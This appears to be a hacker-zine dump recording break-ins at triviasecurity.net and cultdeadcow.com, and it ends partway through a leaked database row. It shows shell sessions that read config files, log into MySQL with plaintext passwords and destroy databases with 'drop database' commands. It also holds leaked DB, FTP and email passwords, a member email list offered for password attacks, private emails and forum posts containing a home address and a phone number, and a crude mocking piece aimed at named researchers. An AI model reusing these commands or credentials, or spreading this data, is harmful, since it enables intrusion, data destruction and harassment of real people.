zone "spinstorm.triviasecurity.com.ru" { type master; file "/var/named/spinstorm.triviasecurity.com.ru.db"; }; zone "niid.com.np" { type master; file "/var/named/niid.com.np.db"; }; zone "nag.co.in" { type master; file "/var/named/nag.co.in.db"; }; zone "villain.triviasecurity.com.ru" { type master; file "/var/named/villain.triviasecurity.com.ru.db"; }; zone "triviasecurity.org" { type master; file "/var/named/triviasecurity.org.db"; }; zone "grouptater.com" { type master; file "/var/named/grouptater.com.db"; }; zone "dark-hack.net" { type master; file "/var/named/dark-hack.net.db"; }; zone "bitsaa.in" { type master; file "/var/named/bitsaa.in.db"; }; zone "cadnepal.com" { type master; file "/var/named/cadnepal.com.db"; }; zone "source2nepal.com" { type master; file "/var/named/source2nepal.com.db"; }; zone "jnepal.com" { type master; file "/var/named/jnepal.com.db"; }; apache-3.00$ ls -al ../ total 440 drwxr-xr-x 17 triviasec triviasec 4096 Feb 22 21:39 . drwx--x--x 8 triviasec triviasec 4096 Jun 27 2007 .. -rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 400.shtml -rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 401.shtml -rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 403.shtml -rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 404.shtml -rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 500.shtml -rw-r--r-- 1 triviasec triviasec 15709 Jun 26 2007 aboutus.gif drwxr-xr-x 7 triviasec triviasec 4096 Feb 7 02:27 amado drwxr-xr-x 2 triviasec triviasec 4096 Aug 3 2007 awstats drwxr-xr-x 5 triviasec triviasec 4096 Jul 9 2007 blog drwxr-xr-x 9 triviasec triviasec 4096 Jan 8 19:40 boards -rw-r--r-- 1 triviasec triviasec 165 Jan 9 19:21 c-b-m.gif drwxr-xr-x 2 triviasec triviasec 4096 Jun 26 2007 cgi-bin -rw-r--r-- 1 triviasec triviasec 3401 Jan 24 18:50 contact.php -rw-r--r-- 1 triviasec triviasec 196 Feb 22 21:35 crossdomain.xml drwxrwxrwx 4 triviasec triviasec 221184 Mar 2 16:43 exploits -rw-r--r-- 1 triviasec triviasec 3977 Jan 27 06:02 exploits.php drwxr-xr-x 12 triviasec triviasec 4096 Oct 27 13:22 games -rw-r--r-- 1 triviasec triviasec 1329 Jan 26 19:19 getimg.php -rw-r--r-- 1 triviasec triviasec 111 Dec 23 22:27 .htaccess -rw-r--r-- 1 triviasec triviasec 4774 Dec 22 15:57 .htimport-lib.php drwxr-xr-x 2 triviasec triviasec 4096 Jan 9 19:21 images -rw-r--r-- 1 triviasec triviasec 5362 Dec 24 04:24 index2.php -rw-r--r-- 1 triviasec triviasec 2127 Jan 18 00:19 indexold.php -rw-r--r-- 1 triviasec triviasec 2992 Jan 27 02:59 index.php drwxrwxrwx 50 triviasec triviasec 4096 Jan 15 00:43 lib -rw-r--r-- 1 triviasec triviasec 8763 Jan 28 21:21 library.php -rwxr-xr-x 1 triviasec triviasec 13954 Sep 15 2006 logo.jpg -rw-r--r-- 1 triviasec triviasec 5591 Dec 24 17:55 lt180.gif -rw-r--r-- 1 triviasec triviasec 9307 Nov 4 16:47 lt.gif drwxr-xr-x 4 triviasec triviasec 4096 Jan 18 04:48 minimal drwxr-xr-x 9 triviasec triviasec 4096 Dec 23 17:13 search drwxr-xr-x 2 triviasec triviasec 4096 Jan 8 02:19 ssb drwxr-xr-x 2 triviasec triviasec 4096 Feb 22 21:39 temp -rw-r--r-- 1 triviasec triviasec 2616 Jan 27 17:30 triviasecurity-portal2.css -rw-r--r-- 1 triviasec triviasec 2943 Jan 18 20:41 triviasecurity-portal.css drwxr-xr-x 2 triviasec triviasec 4096 Jan 28 21:20 ts_images -rw-r--r-- 1 triviasec triviasec 12544 Jan 13 20:32 video-tutorials.php drwxr-xr-x 2 triviasec triviasec 4096 Jan 5 21:44 xss apache-3.00$ cat /home/triviasec/domains/triviasecurity.net/public_html/blog/wp-config.php triviasec_blog apache-3.00$ mysql -utriviasec_blog -pxx11210gAF~ < triviasec_blog apache-3.00$ echo 'drop database triviasec_forums;' > triviasec_forums apache-3.00$ echo 'drop database triviasec_downloads;' >> triviasec_forums apache-3.00$ echo 'drop database triviasec_portal;' >> triviasec_forums apache-3.00$ echo 'drop database triviasec_games;' >> triviasec_forums apache-3.00$ mysql -utriviasec_forums -pSStd1145~rr < triviasec_forums apache-3.00$ apache-3.00$ uname -a Linux triviasecurity.net 2.6.9-67.0.4.ELsmp #1 SMP Sun Feb 3 07:08:57 EST 2008 i686 i686 i386 GNU/Linux zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 Pwnie Awards zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 Ladies and gentlemen, and other esteemed members of our audience, tonight we've spent some time looking at certain well known people in the security industry in order to bring you a _very_ special treat -- the first ever ZF0 pwnie awards!! It was very hard to narrow down the vast number of unwitting applicants we had, but alas, there are only so many categories. I'm sure that the others we didn't mention can be awarded some sort of award in #phrack@EFNet or on FD so they won't feel left out. Aaaaannnnd now, the moment you've all been so eagerly anticipating, let's roll out the red carpet and break out the theme music for our winners! Firstly, in an ever popular category these days, We have our nominations for the "Most narrowly directed researcher" award. The nominations were: 1. kuza55 -- Some guy who presented at MS's bluehat conference about the dangers of XSS. XSS effects us all, and we should all work to eradicate it by writing a tutorial on how to exploit XSS vulns for our local l33t h4qr website and post a zillion and ten XSS advisories on milw0rm/FD/bugtraq a day. 2. Luigi Auriemma -- A relative newcomer to the security industry, he has never-the-less been extremely active in posting basic web vulns and easy stack overflows against Windows apps on milw0rm and FD. I mean, there's nothing like auditing five year old code that no one uses for strcpy() eh? 3. RSnake -- This man again is well known for his XSS skillz. His famous XSS cheat sheet provides encodings for things like <, > /, etc in various formats for people too lazy to code an ASCII/hex/unicode converter or too lazy to run `man ascii'. A real winner. His web skillz are so legendary that he's spoken at many conferences and even has several blogs where he talks about such interesting topics like CSRF (and of course XSS). Ahem. And the winner is....... RSNAKE!!!! Congratulations Rsnake, you have won the award for Most Narrowly Directed Researcher! If you'd be so kind, you can send your acceptance speech to our email address, superheroes@hushmail.com. Oh, and if you'd like to add another award to your already vast collection, learn how to use a compiler and you may get another pwnie, that of Biggest Masturbator. Speaking of which... Biggest Masturbator. This is one of the most highly valued awards because it means that the nominees are all far too busy getting their hax on to think about having a sex life. *Ever*. Remember, these researchers are not a dime a dozen, and each of them can do things that make #blackhats@EFNet members get hardons. And, in no particular order, our nominees: 1. Halvar Flake -- This guy is nuts. Literally. He's a giant with red hair who has been known to spend months auditing binaries (he's been known to work on a single binary audit longer than he has worked for one company). A true inspiration to all the kids torrenting IDA at this very second. We love you Halvar. 2. Mark Dowd -- Another super intelligent chap, this man was formerly an ADM member known as Duke. The Duke later left his blackhat roots behind him and migrated to the nice sterile offices of ISS XForce. At work, he does insane things like code Flash exploits that make Thomas Ptacek cum for days. In his spare time he hunts down integer issues in the Ruby interpreter. If anyone can find a way to make a computer suck a dick, this is the man to do it. 3. Felix somebody -- Better known as FX, this German national beat the living shit out of Cisco IOS; not once but several times. Watch out all you .kr and .mx admins, this guy's packing more IOS 11 0day than RSnake can make blog posts in an afternoon. And the winner is Mark Dowd!! Watch out guys, he'll be the first to create the legendary killer-sex-code-auditing robot. For the category of Biggest Let Down there was only one real choice: rgod. I'm sure that everyone by now knows that this .it kid is dead. Not even a suicide note or a mad hax spree? What to waste a perfectly good exit opportunity. At least g4y h1tl3r went out in style. Blogs are very popular these days. Everybody and their intestinal parasites seems to have one. Check out the nominations for Biggest Time Wasting Whitehat Blog: 1. GNUcitizen -- Everyone knows pdp. He loves to post info about CSRF in SOHO routers and mass SNMP scans for the communities "public" and "private". pdp is obviously a very skilled researcher and also happens to be able to write halfway decent English (which is an improvement over 90% of the Internet). 2. ha.ckers.org -- Yup, RSnake again. He's a busy man. But how can you say the words "blog" in a sentence without also saying "RSnake"? 3. Matasano -- The hangout of Thomas Ptacek et al. This is a highly active community where you can engage in endless Internet debates about the "correct" way to check the return value of malloc(). Just talking about it wants to make me visit! And the winner is Matasano hands down!! Congrats guys! Really though, the other nominations are boring as hell and I never fucking read them. Matasano, on the other hand, can easily chew up some hours you could be using to grep for strings like "strcpy" in C code (Luigi will be mad at me for giving away his 0day techniques). Okay folks, that's all the time we have for tonight! Please join us next time for another installment of the ZF0 pwnie awards! Oh, if you won, feel free to send an acceptance speech to superheroes@hushmail.com. If it's halfway decent we may even publish it. zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 The Cult of the Dead Cow zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 Hey y'all... I didn't wanna raise a fuss yet on the general list, but there's this asshole w/an ezine that's just issued a "Call for 0wning" against the cDc (a sort of Gobbles/Phrack High Council thing, I guess). Here's the 'zine: http://exp.vip8.org/papers/175 I was hoping you guys could poke at our stuff a bit and make sure our ducks are in a row? Sorry this has happened - we try and avoid this kind of crap but I guess it's bound to happen sometimes. thx, k3v Hmm, philtered.net is in pretty good shape. we don't expose much externally. I will rotate some passwords though. Did you tell Myles? Adam Yeah, Myles called me this afternoon - I hadn't checked the Sekrut forum in a couple days where there'd been a thread brewing about it. One of our NSF kids in London got hacked by this guy first and he copied a bunch of his personal email into the 'zine. Bad stuff. k3v WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED .-. _ _ .-. / \ .-. ((___)) .-. / \ /FUCK \ / \ .-. [ x x ] .-. / \ /FUCK \ -/-------\-------/-----\-----/---\--\ /--/---\-----/-----\-------/-------\- /THE cDc\ / \ / `-(' ')-' \ / \ /THE cDc\ \ / `-' (U) `-' \ / `-' `-' WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED WE ARE OWNED List of cdc email addresses for you to use passes on: sd josh@anywheremobile.com obscure n7cqNxW3jBMA@gmail.com sirdystic josh@anywheremobile.com freqout freqout@speakeasy.net rfleming rfleming@rotten.com dildog crioux@gmail.com nstalker cht@gis.net carrie carriec@blarg.net oxblood laird@web.net omega omega@rotten.com bo2kdev bo2kdev@l0pht.com bo2kbugs dildog@l0pht.com bo dildog@l0pht.com tfish tfish@world.std.com myles myleslong@gmail.com necrovore yesmar@speakeasy.net xxxclusive renick@gmail.com gratte deadcow@stone.he.net deadcow deadcow@stone.he.net feedback deadcow@stone.he.net veggie lu3ke@yahoo.com tarkin dgullet@circuitsmaximus.com sunspot g@shazbot.com willsie andy@zippy.porterville.k12.ca.us ga matt@coolbeans.com countzero danger.diabolik@gmail.com wknight dan@quakka.com white.knight dan@quakka.com whiteknight dan@quakka.com javaman javaman@ghetto.org assrabbit aconner@eden.rutgers.edu dark_s jonarmst@du.edu webmaster myleslong@gmail.com dayum ahalegarcia@yahoo.com mixter mixter@gmail.com digital digital@phantom.com press press_cdc@yahoo.com books myleslong@gmail.com fgibe dreamwhip@gmail.com gibe dreamwhip@gmail.com $ ls -la /home/deadcow/ total 3508 drwx---r-x 12 deadcow users 4096 Apr 27 09:30 . drwxr-xr-x 215 root root 8192 Apr 22 12:43 .. -rw-r--r-- 1 deadcow users 6278 Jul 14 2004 .addressbook -rw-r--r-- 1 deadcow users 3653 Jul 14 2004 .addressbook.lu -rw-r--r-- 1 deadcow users 5393 Feb 25 11:30 .bash_history -rw-r--r-- 1 deadcow users 34 Nov 23 1993 .less -rw-r--r-- 1 deadcow users 114 Nov 23 1993 .lessrc lrwxrwxrwx 1 deadcow users 9 Aug 20 2007 .mysql_history -> /dev/null -rw------- 1 deadcow users 15982 Nov 7 2005 .pine-debug1 -rw------- 1 deadcow users 11475 Oct 9 2005 .pine-debug2 -rw------- 1 deadcow users 11559 Oct 8 2005 .pine-debug3 -rw------- 1 deadcow users 12536 Oct 5 2005 .pine-debug4 -rw-r--r-- 1 deadcow users 18190 Feb 25 11:22 .pinerc -rw------- 1 deadcow users 1024 Sep 11 2005 .rnd -rw-r--r-- 1 deadcow users 1199 Jan 24 22:57 .virtualmail -rw------- 1 deadcow users 821 Aug 15 2007 .virtualmail.save drwx------ 3 deadcow users 17 Aug 18 2007 .webmail -rw-r--r-- 1 deadcow users 2798 Jul 28 2006 20060720_scatterchat_emails_to_NSA.txt drwx------ 2 deadcow users 6 Jan 6 2000 Mail drwx---r-x 2 deadcow users 6 Jan 2 2000 annon-ftp-old -rw-r--r-- 1 deadcow users 162 Aug 8 2000 cDc.css drwxr-xr-x 2 deadcow users 25 May 5 09:32 cgi-bin -rw------- 1 deadcow users 3248128 Jul 14 2004 core -rw------- 1 deadcow users 893 Feb 25 11:27 dead.letter -rw-r--r-- 1 deadcow users 1566 Jan 1 2002 hatemail.txt -rw-r--r-- 1 deadcow users 1695 Aug 8 2000 logo.gif lrwxrwxrwx 1 deadcow users 13 Jun 21 2006 logs -> /logs/deadcow drwx------ 2 deadcow users 43 Jan 26 07:19 mail -rw-r--r-- 1 deadcow users 15364 Mar 6 2000 old.cDc-0011.txt -rw-r--r-- 1 deadcow users 8600 Mar 6 2000 old.cDc-0012.txt -rw-r--r-- 1 deadcow users 13322 Mar 6 2000 old.cDc-0025.txt -rw-r--r-- 1 deadcow users 8178 Mar 6 2000 old.cDc-0032.txt -rw-r--r-- 1 deadcow users 19295 Mar 6 2000 old.cDc-0034.txt -rw-r--r-- 1 deadcow users 3540 Mar 6 2000 old.cDc-0037.txt -rw-r--r-- 1 deadcow users 200 Oct 12 2000 ps.out drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 public_html drwxr-xr-x 2 deadcow users 4096 Feb 22 15:36 public_torrents -rw-r--r-- 1 deadcow users 66293 Jan 5 2002 realpirate.cdc drwxr-xr-x 2 deadcow users 114 Aug 8 2000 search drwxr-xr-x 3 deadcow users 71 Jul 26 2000 secure_html -rw-r--r-- 1 deadcow users 43 Aug 8 2000 spacer.gif -rw-r--r-- 1 deadcow users 414 Jan 2 2002 spanish.txt drwxr-xr-x 2 deadcow users 6 Apr 27 09:13 trash -rw-r--r-- 1 deadcow users 13972 Aug 8 2000 vaca.gif $ ls -la /home/deadcow/public_html/ total 924 drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 . drwx---r-x 12 deadcow users 4096 Apr 27 09:30 .. -rw-r--r-- 1 deadcow users 212 Jul 26 2007 .htaccess -rw-r--r-- 1 deadcow users 1226 Apr 28 2007 .htaccess.old drwxr-xr-x 2 deadcow users 53 Jan 4 2000 .status -rw-r--r-- 1 deadcow users 100 Feb 8 2001 301.html -rw-r--r-- 1 deadcow users 100 Feb 8 2001 400.html -rw-r--r-- 1 deadcow users 100 Feb 8 2001 401.html -rw-r--r-- 1 deadcow users 100 Feb 8 2001 403.html -rw-r--r-- 1 deadcow users 100 Feb 8 2001 404.html -rw-r--r-- 1 deadcow users 100 Feb 8 2001 500.html -rw-r--r-- 1 deadcow users 100 Feb 8 2001 501.html -rw-r--r-- 1 deadcow users 257 Jun 6 2005 about_us.php3 -rw-r--r-- 1 deadcow users 467 Jun 19 2006 addfeed.php -rw-r--r-- 1 deadcow users 1094 Feb 7 2001 appearance_list.php3 drwxr-xr-x 2 deadcow users 62 Aug 8 2007 appearances -rw-r--r-- 1 deadcow users 253 Aug 13 2005 apps.php3 drwxrwxrwx 26 deadcow users 40960 Apr 22 08:35 archives -rw-r--r-- 1 deadcow users 3810 Feb 7 2001 audio_index.php3 -rw-r--r-- 1 deadcow users 5319 Mar 6 2000 back_orifice.txt drwxr-xr-x 2 deadcow users 12288 Apr 24 09:29 banners drwxr-xr-x 10 deadcow users 4096 Mar 25 07:41 bovinedawn -rw-r--r-- 1 deadcow users 2369 Jun 19 2006 bulletin.php -rw-r--r-- 1 deadcow users 705 Jun 19 2006 bulletinpost.php -rw-r--r-- 1 deadcow users 75964 Mar 6 2000 c6.txt -rw-r--r-- 1 deadcow users 162 Aug 8 2000 cDc.css drwxrwxrwx 5 deadcow users 92 Apr 22 08:37 cDc_books drwxrwxrwx 7 deadcow users 24576 Mar 26 03:16 cDc_files drwxrwxrwx 3 deadcow users 4096 Feb 15 14:16 cDc_pix drwxr-xr-x 3 deadcow users 4096 Jan 18 01:31 cDc_tunes drwxrwxrwx 2 deadcow users 4096 May 8 09:33 cache -rw-r--r-- 1 deadcow users 861 Feb 7 2001 cdc_footer.php3 -rw-r--r-- 1 deadcow users 13261 Jul 22 2002 cdc_header.BAK2 -rw-r--r-- 1 deadcow users 13261 Feb 7 2001 cdc_header.php3 -rw-r--r-- 1 deadcow users 13849 Feb 7 2001 cdc_header.php3.BAK drwxrwxrwx 4 deadcow users 4096 May 6 16:06 cdc_test -rw-r--r-- 1 deadcow users 0 Jan 17 2000 checker drwxrwxrwx 8 deadcow users 8192 Apr 22 08:39 cms -rw-r--r-- 1 deadcow users 732 Mar 19 2001 common.php3 -rw-r--r-- 1 deadcow users 675 Feb 7 2001 common.php3.BAK -rw-r--r-- 1 deadcow users 1971 Feb 7 2001 contact.php3 -rw-r--r-- 1 deadcow users 604 Jul 24 2001 contact_action.php3 drwxr-xr-x 7 deadcow users 4096 Aug 23 2007 cowfeed -rw-r--r-- 1 deadcow users 151 Jan 28 13:11 deeznutz.php -rw-r--r-- 1 deadcow users 253 Aug 13 2005 details.php3 -rw-r--r-- 1 deadcow users 9091 Aug 8 2000 dhtml.html drwxr-xr-x 14 deadcow users 4096 Jan 29 10:30 dsF77E9qqXvY79t7Ic2d -rw-r--r-- 1 deadcow users 252 Jun 6 2005 faq.php3 -rw-r--r-- 1 deadcow users 256 Aug 13 2005 fashion.php3 -rw-r--r-- 1 deadcow users 846 Oct 29 2004 favicon.ico drwxrwxrwx 2 deadcow users 45 Apr 22 08:36 feeds -rw-rw-rw- 1 deadcow users 86 Feb 15 12:15 feeds.txt -rw-r--r-- 1 deadcow users 262 Jun 6 2005 gallery_index.php3 -rw-r--r-- 1 deadcow users 623 Mar 6 2000 grafix.gif -rw-r--r-- 1 deadcow users 294 Aug 8 2000 graphic_only.php3 -rw-r--r-- 1 deadcow users 16580 Jul 17 2000 hacktivismo.gif -rw-r--r-- 1 deadcow users 260 Jul 9 2005 hacktivismo.html -rw-r--r-- 1 deadcow users 2303 Jan 5 2000 heads.gif -rw-r--r-- 1 deadcow users 3250 Mar 6 2000 hkbsplits.txt -rw-r--r-- 1 deadcow users 7375 Dec 29 2000 home -rw-r--r-- 1 deadcow users 236 Mar 6 2000 icon.gif drwxr-xr-x 2 deadcow users 4096 Apr 3 13:10 images -rw-r--r-- 1 deadcow users 2082 Jul 31 2002 index-bak2 -rw-r--r-- 1 deadcow users 2904 Jan 17 2000 index.html.bak -rw-rw-rw- 1 deadcow users 2928 Feb 19 2006 index.html.old -rw-r--r-- 1 deadcow users 2451 Mar 14 13:44 index.php -rw-r--r-- 1 deadcow users 3026 Nov 15 2006 index.php.bak -rw-r--r-- 1 deadcow users 692 Aug 8 2000 index.php3.bak -rw-r--r-- 1 deadcow users 4146 Aug 16 2006 indexold.php drwxr-xr-x 2 deadcow users 62 Jan 17 2000 k-cow -rw-r--r-- 1 deadcow users 1123 Aug 8 2000 kcow_phorce.php3 -rw-r--r-- 1 deadcow users 1410 Aug 8 2000 large_image.php3 -rw-r--r-- 1 deadcow users 69 Mar 6 2000 left.gif drwxr-xr-x 2 deadcow users 23 Oct 13 2004 links -rw-r--r-- 1 deadcow users 447 Mar 6 2000 links.gif -rw-r--r-- 1 deadcow users 254 Jun 6 2005 links.php3 -rw-r--r-- 1 deadcow users 2562 Jul 25 2004 logo.gif -rw-r--r-- 1 deadcow users 1695 Aug 8 2000 logo_v5.gif -rw-r--r-- 1 deadcow users 687 Aug 8 2000 long_page_display.php3 -rw-r--r-- 1 deadcow users 253 Jul 18 2004 main.php3 -rw-r--r-- 1 deadcow users 590 Mar 6 2000 media.gif -rw-r--r-- 1 deadcow users 220332 Mar 12 2000 medialist6.html drwxr-xr-x 2 deadcow users 23 Jul 9 2005 members drwxr-xr-x 5 deadcow users 116 Jan 22 2006 merchandise -rw-r--r-- 1 deadcow users 260 Jun 6 2005 merchandise.php3 drwxr-xr-x 2 deadcow users 23 Oct 17 2004 music drwxr-xr-x 5 deadcow users 4096 Jan 28 2007 news -rw-r--r-- 1 deadcow users 4207 Feb 7 2001 news_archive.php3 drwxr-xr-x 2 deadcow users 51 Oct 13 2004 newspapers -rw-r--r-- 1 deadcow users 267 Jun 6 2005 ninja_strike_force.php3 drwxr-xr-x 3 deadcow users 36 Jul 9 2005 nsf drwxr-xr-x 4 deadcow users 4096 May 1 2007 oldskool drwxr-xr-x 2 deadcow users 4096 Jan 28 2007 panel2001 -rw-r--r-- 1 deadcow users 1122 Aug 8 2000 photo_logo.php3 drwxr-xr-x 2 deadcow users 43 Dec 10 2006 php drwxrwxrwx 20 deadcow users 4096 Apr 22 08:37 pics -rw-r--r-- 1 deadcow users 655 Aug 8 2000 populate.php3 -rw-r--r-- 1 deadcow users 260 Jul 10 2005 pr19990719.html -rw-r--r-- 1 deadcow users 1065 Feb 7 2001 press.php3 -rw-r--r-- 1 deadcow users 3937 Aug 8 2000 press_releases.php3 drwxr-xr-x 2 deadcow users 43 Jul 9 2005 prox -rw-r--r-- 1 deadcow users 44 Oct 12 2000 pvers.php3 -rw-r--r-- 1 deadcow users 432 Sep 2 2006 random_splash.php -rw-r--r-- 1 deadcow users 11434 Mar 6 2000 rebuttal.txt -rw-r--r-- 1 deadcow users 4803 Mar 6 2000 response.txt -rw-r--r-- 1 deadcow users 0 Jul 9 2005 robots.txt drwxr-xr-x 3 deadcow users 110 Jul 9 2005 search drwxr-xr-x 2 deadcow users 60 Aug 24 2007 sekrut -rw-r--r-- 1 deadcow users 43 Aug 8 2000 spacer.gif drwxr-xr-x 2 deadcow users 4096 Nov 17 12:18 splash drwxrwxrwx 3 deadcow users 4096 Nov 26 14:56 strategy -rw-r--r-- 1 deadcow users 1076 Jul 20 2006 style.css -rw-r--r-- 1 deadcow users 258 Jun 6 2005 team_bios.php3 drwxr-xr-x 2 deadcow users 4096 Jul 12 2005 templates drwxr-xr-x 2 deadcow users 96 Jul 20 2006 test -rw-r--r-- 1 deadcow users 422 Apr 4 2001 text_only.php3 -rw-r--r-- 1 deadcow users 263 Jun 6 2005 textfile_index.php3 drwxr-xr-x 14 deadcow users 4096 Feb 18 15:32 tools drwxr-xr-x 2 deadcow users 4096 Feb 11 2001 trash -rw-r--r-- 1 deadcow users 13972 Aug 8 2000 vaca.gif -rw-r--r-- 1 deadcow users 1051 Aug 8 2000 who_helping.php3 $ ls -la /home/deadcow/public_html/sekrut total 72 drwxr-xr-x 2 deadcow users 60 Aug 24 2007 . drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 .. -rw-r--r-- 1 deadcow users 1033 Aug 24 2007 index.php -rw-r--r-- 1 deadcow users 25671 Aug 24 2007 secrets1.jpg -rw-r--r-- 1 deadcow users 31090 Aug 24 2007 secrets2.jpg $ ls -la /home/deadcow/public_html/strategy/ total 116 drwxrwxrwx 3 deadcow users 4096 Nov 26 14:56 . drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 .. -rw-rw-rw- 1 nobody nobody 1036 Jun 18 2006 about.php -rw-rw-rw- 1 nobody nobody 948 Jun 17 2006 affiliates.php drwxrwxrwx 2 nobody nobody 4096 Jun 17 2006 archives -rw-rw-rw- 1 nobody nobody 1195 Jun 17 2006 archives.html -rw-rw-rw- 1 nobody nobody 11646 Jun 17 2006 atom.xml -rw-rw-rw- 1 nobody nobody 864 Jun 17 2006 contact.php -rw-rw-rw- 1 nobody nobody 6411 Jun 18 2006 entry.php -rw-rw-rw- 1 nobody nobody 6621 Jul 26 2006 index.php -rw-rw-rw- 1 nobody nobody 2942 Jun 17 2006 index.rdf -rw-rw-rw- 1 nobody nobody 2494 Jun 17 2006 index.xml -rw-rw-rw- 1 nobody nobody 485 Jul 26 2006 main.php -rw-rw-rw- 1 nobody nobody 44 Jun 17 2006 media.php -rw-rw-rw- 1 nobody nobody 54 Jun 17 2006 news.php -rw-rw-rw- 1 nobody nobody 8615 Jul 27 2006 publications.php -rw-rw-rw- 1 nobody nobody 541 Jun 14 2006 rsd.xml -rw-rw-rw- 1 nobody nobody 1735 Jun 18 2006 search.php -rw-rw-rw- 1 nobody nobody 4889 Jun 22 2006 staff.php -rw-rw-rw- 1 nobody nobody 3249 Jun 16 2006 staff.txt -rw-rw-rw- 1 nobody nobody 262 Nov 26 14:56 styles-site.css $ ls -la /home/deadcow/public_html/k-cow/ total 24 drwxr-xr-x 2 deadcow users 62 Jan 17 2000 . drwxr-xr-x 39 deadcow users 4096 Apr 27 09:09 .. -rw-r--r-- 1 deadcow users 476 Jan 17 2000 WS_FTP.LOG -rw-r--r-- 1 deadcow users 4669 Jan 17 2000 index.html -rw-r--r-- 1 deadcow users 3748 Jan 17 2000 index_plain.htm $ cat /home/deadcow/public_html/bovinedawn/config.php $ cat /home/deadcow/public_html/dsF77E9qqXvY79t7Ic2d/mt-config.cgi ## Movable Type configuration file ## ## ## ## This file defines system-wide settings for Movable Type ## ## In total, there are over a hundred options, but only those ## ## critical for everyone are listed below. ## ## ## ## Information on all others can be found at: ## ## http://www.sixapart.com/movabletype/docs/config ################################################################ ##################### REQUIRED SETTINGS ######################## ################################################################ # The CGIPath is the URL to your Movable Type directory CGIPath http://www.cultdeadcow.com/dsF77E9qqXvY79t7Ic2d/ # The StaticWebPath is the URL to your mt-static directory # Note: Check the installation documentation to find out # whether this is required for your environment. If it is not, # simply remove it or comment out the line by prepending a "#". StaticWebPath http://www.cultdeadcow.com/dsF77E9qqXvY79t7Ic2d/mt-static #================ DATABASE SETTINGS ================== # REMOVE all sections below that refer to databases # other than the one you will be using. ##### MYSQL ##### ObjectDriver DBI::mysql Database deadcow DBUser deadcow DBPassword KSGmrFp0Qec2dQsbDWi1 DBHost stone # Comment Script # CommentScript hnRYBnJSmLM7RAZ9IfdHC.cgi # Admin Script # AdminScript xZ3e3PbDYWYzxcLF89aX.cgi $ cat /home/deadcow/.bash_history dir cd temp-to-be-deleted dir tar -xvzf cdc_site_07_14_2006.tgz 'public_html/mt/search_templates/default.tmpl' dir tar -xvzf cdc_site_07_14_2006.tgz exit pine exit pine exit pine exit pine ls exit pine exit pine ls cd public_html ls cd cDc_tunes ls rm CDC262.MP3 ls mv CDC263.MP3 CDC262.MP3 ls rm CDC262.MP3 ls exit pine exit ls cd public_html ls cd cDc_tunes ls ls -la ls -la ls -la exit cd public_html/sekrut dir exit dir cd public_html makedir bovinedawn cd dojo dir chmod 666 config.php mysql mysql zkq7fswz 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addy is: 45465 25th St. East #144 Lancaster, CA 93535\r\n\r\nThank you NS, appreciate it.\r\n-Siph'), (4142,'00243d938a','[quote:00243d938a=\"GreenDiamond\"]Been noticing the amount of registered users climbing up, about three-hundred within the past few days. They\'re probably really bumming some SEO off of cultdeadcow.[/quote:00243d938a]\r\n\r\nIndeed. I need to go through and delete these fuckers. I do that about once per week, fun!'), (2189,'b3bf87a14b','Actually, in all seriousness, I did have to fuck a cow. A dead cow. It made me kind of nervous and sort of smelled bad, but it was pretty hot, and I don\'t think that the cow minded much. It\'s really hard once rigermortis sets in, because it is just not as flexible.'), (2670,'7632aa9253','Hey man just use my password for the moment, I\'m too lazy to figure out why ur ftp account doesn\'t work:\r\n\r\nusername: hardwire\r\npassword: Emp1repr0duX\r\n\r\ndon\'t uh, delete anything or i\'ll have to like... re-upload it. :)\r\n\r\nIf you need to make a SQL database the control panel is at: http://www.nethertech.org/cpanel\r\n\r\nuse the same name/pwd'), (347,'f139ce7d58','Dildog,\r\n\r\nHeads up. Kevin directed me to you. I am working on the next version of Torpark and the release of the new Torhawk. I want to give back to cDc/Hackmo/NSF because I am about to monetize the situation. This has become a trademarking issue. I want the cDc stamp of approval, so I need someone to review it. Either to review the source code, anon network, or both. And that means I need a dildog up in my ports. Ratte suggested you were the man for the job. And if you weren\'t man enough, you could suggest someone who was. And of course, this would mean some sort of fee or percentage of net profits.\r\n\r\nLet\'s rap.\r\n\r\nemail to arrakistor@gmail.com, or call me at +1.469.831.6648, but tell me the phone number you will cal from or hack the caller ID to say "1337" and I will directly pickup.\r\n\r\nSteve'), (5146,'7b39b848db','thanks, snookums. your awesomeness is matched only by your virility. In return, I give you the password to transend\'s email:\r\n\r\ntransend@dcemail.com\r\nsinjin\r\n\r\nluv <3'), (4369,'a3a07bfce2','Dear Mr. Tesla,\r\n\r\nI\'m glad that you got the word on the t-file, but have you seen the entire message that G\'Ratte sent me on this? \r\n\r\nSign 